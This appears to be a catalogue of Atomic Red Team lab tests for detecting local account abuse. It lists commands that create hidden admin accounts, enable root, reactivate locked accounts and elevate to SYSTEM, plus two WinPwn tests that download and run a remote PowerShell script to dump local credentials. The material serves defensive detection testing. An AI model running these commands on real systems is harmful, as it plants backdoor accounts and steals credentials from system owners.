Executable Atomic Red Team test cases for exercising this technique in a lab. Copy a command, run it on the listed platform, confirm your detections fire.
command_promptelevatedwindowsCreate local account with admin privileges
After execution the new account will be active and added to the Administrators group
net user art-test /add
net user art-test #{password}
net localgroup administrators art-test /add
bashelevatedmacosCreate local account with admin privileges - MacOS
After execution the new account will be active and added to the Administrators group
dscl . -create /Users/AtomicUser
dscl . -create /Users/AtomicUser UserShell /bin/bash
dscl . -create /Users/AtomicUser RealName "Atomic User"
dscl . -create /Users/AtomicUser UniqueID 503
dscl . -create /Users/AtomicUser PrimaryGroupID 503
dscl . -create /Users/AtomicUser NFSHomeDirectory /Local/Users/AtomicUser
dscl . -passwd /Users/AtomicUser mySecretPassword
dscl . -append /Groups/admin GroupMembership AtomicUser
bashelevatedmacosCreate local account with admin privileges using sysadminctl utility - MacOS
After execution the new account will be active and added to the Administrators group
sysadminctl interactive -addUser art-tester -fullName ARTUser -password !pass123! -admin
bashelevatedmacosEnable root account using dsenableroot utility - MacOS
After execution the current/new user will have root access
dsenableroot #current user
dsenableroot -u art-tester -p art-tester -r art-root #new user
bashelevatedmacosAdd a new/existing user to the admin group using dseditgroup utility - macOS
After execution the current/new user will be added to the Admin group
dseditgroup -o edit -a art-user -t user admin
powershellelevatedwindowsWinPwn - Loot local Credentials - powerhell kittie
Loot local Credentials - powerhell kittie technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive
powershellelevatedwindowsWinPwn - Loot local Credentials - Safetykatz
Loot local Credentials - Safetykatz technique via function of WinPwn
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
safedump -consoleoutput -noninteractive
bashelevatedlinuxCreate local account (Linux)
An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
password=$(openssl passwd -1 art)
([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
su art -c "whoami; exit"
bashelevatedlinuxReactivate a locked/expired account (Linux)
A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate.
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
usermod --lock art
usermod --expiredate "1" art
usermod --unlock art
usermod --expiredate "99999" art
su -c whoami art
shelevatedlinuxReactivate a locked/expired account (FreeBSD)
A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate.
In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
pw useradd art -g wheel -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0
pw lock art
pw usermod art -e +1d
pw unlock art
pw user mod art -e +99d
su art
whoami
exit
bashelevatedlinuxLogin as nobody (Linux)
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look like in `/etc/passwd` before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin`
cat /etc/passwd |grep nobody
chsh --shell /bin/bash nobody
usermod --password $(openssl passwd -1 nobody) nobody
su -c "whoami" nobody
shelevatedlinuxLogin as nobody (freebsd)
An adversary may try to re-purpose a system account to appear legitimate. In this test change the login shell of the nobody account, change its password to nobody, su to nobody, exit, then reset nobody's shell to /usr/sbin/nologin. Here is how the nobody entry should look like in `/etc/passwd` before the test is executed and right after the cleanup: `# -> nobody:x:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin`
cat /etc/passwd |grep nobody
pw usermod nobody -s /bin/sh
echo $(openssl passwd -1 art) | pw mod user nobody -h 0
su nobody
whoami
exit
command_promptelevatedwindowsUse PsExec to elevate to NT Authority\SYSTEM account
PsExec is a powerful tool most known for its remote management capability. However, it can also be used to run processes as the local system account.
The local system account is a default windows account which has unrestricted access to all system resources.
Upon successful execution, PsExec.exe will spawn a command prompt which will run 'whoami' as the local system account and then exit.
"PathToAtomicsFolder\..\ExternalPayloads\PsExec.exe" -accepteula -s %COMSPEC% /c whoami